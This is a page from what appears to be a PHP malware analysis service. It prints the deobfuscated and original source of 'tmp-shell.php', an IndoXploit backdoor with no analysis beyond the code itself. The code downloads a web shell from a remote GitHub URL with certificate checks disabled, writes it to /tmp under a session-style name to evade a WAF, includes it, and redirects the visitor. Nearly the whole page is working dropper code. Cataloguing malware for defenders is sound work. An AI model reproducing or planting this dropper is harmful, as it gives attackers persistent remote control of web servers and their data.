PHP Malware Analysis

Back to list

Filename: tmp-shell.php

Tags

URLs

Deobfuscated code

<?php

# IndoXploit TMP Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)
# Coded by: L0c4lh34rtz - IndoXploit
$data = ['https://raw.githubusercontent.com/indoxploit-coders/indoxploit-shell/master/shell-v3.php', '/tmp/sess_' . md5($_SERVER['HTTP_HOST']) . '.php'];
if (file_exists($data[1]) && filesize($data[1]) !== 0) {
    include $data[1];
} else {
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    echo "<script>window.location=\"?indoxploit\";</script>";
}
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
}


Original code

<?php
# IndoXploit TMP Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)
# Coded by: L0c4lh34rtz - IndoXploit

$data = ['https://raw.githubusercontent.com/indoxploit-coders/indoxploit-shell/master/shell-v3.php', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];

if(file_exists($data[1]) && filesize($data[1]) !== 0) {
    include($data[1]);
} else {
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    echo '<script>window.location="?indoxploit";</script>';
}

function get($url) {
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
          curl_close($ch);
}
?>